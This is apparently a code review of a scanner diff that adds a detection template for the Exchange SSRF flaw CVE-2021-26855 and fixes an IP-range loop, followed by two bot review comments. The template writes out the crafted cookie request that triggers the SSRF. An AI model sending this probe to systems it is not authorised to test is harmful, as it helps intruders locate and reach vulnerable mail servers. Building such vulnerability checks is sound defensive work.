diff --git a/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml b/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml
new file mode 100644
index 0000000..6b80262
--- /dev/null
+++ b/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml
@@ -0,0 +1,14 @@
+name: poc-yaml-exchange-cve-2021-26855-ssrf
+rules:
+ - method: GET
+ path: /owa/auth/x.js
+ headers:
+ Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
+ follow_redirects: false
+ expression: |
+ response.headers["X-CalculatedBETarget"].icontains("localhost")
+detail:
+ author: sharecast
+ Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010"
+ links:
+ - https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse
\ No newline at end of file
diff --git a/common/ParseIP.go b/common/ParseIP.go
index 4716ed2..5ae5649 100644
--- a/common/ParseIP.go
+++ b/common/ParseIP.go
@@ -131,7 +131,7 @@ func ParseIPC(ip string) ([]string, error) {
 }
 startNum := start[0]<<24 | start[1]<<16 | start[2]<<8 | start[3]
 endNum := end[0]<<24 | end[1]<<16 | end[2]<<8 | end[3]
- for num := startNum; num < endNum; num++ {
+ for num := startNum; num <= endNum; num++ {
 ip := strconv.Itoa((num>>24)&0xff) + "." + strconv.Itoa((num>>16)&0xff) + "." + strconv.Itoa((num>>8)&0xff) + "." + strconv.Itoa((num)&0xff)
 AllIP = append(AllIP, ip)
 }
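Review bot: The `expression` looks up `response.headers["X-CalculatedBETarget"]` in mixed case, and whether that key ever exists depends on how the scanner stores response headers, which this diff does not show. Go's net/http canonicalizes header names, so if the map is filled straight from `http.Header` keys the entry would be `X-Calculatedbetarget` and the rule would silently report unpatched hosts as clean. Confirm against the response parser; if keys are canonicalized, use `response.headers["X-Calculatedbetarget"]` or normalise case on both sides. The rule also matches on the header value alone, so once the expected status is checked against the linked NSE script, adding a `response.status` condition would make the match stricter.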
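Review bot: The now-inclusive loop in ParseIPC still materialises every address of the range as a string in `AllIP`, and nothing visible in the hunk bounds `endNum - startNum` or rejects `startNum > endNum`. ParseIPC starts above the hunk and continues below it, so such a check may already exist out of view. If it does not, a mistyped range allocates millions of entries before any scan starts, and a reversed range returns an empty list with no error. A guard before the loop would cover both, e.g. `if endNum < startNum || endNum-startNum > maxRange { return nil, errors.New("invalid or oversized ip range") }`, where `maxRange` is a placeholder for a limit the project chooses. Separately, `ip :=` inside the loop shadows the `ip` parameter, so a different local name would read more clearly.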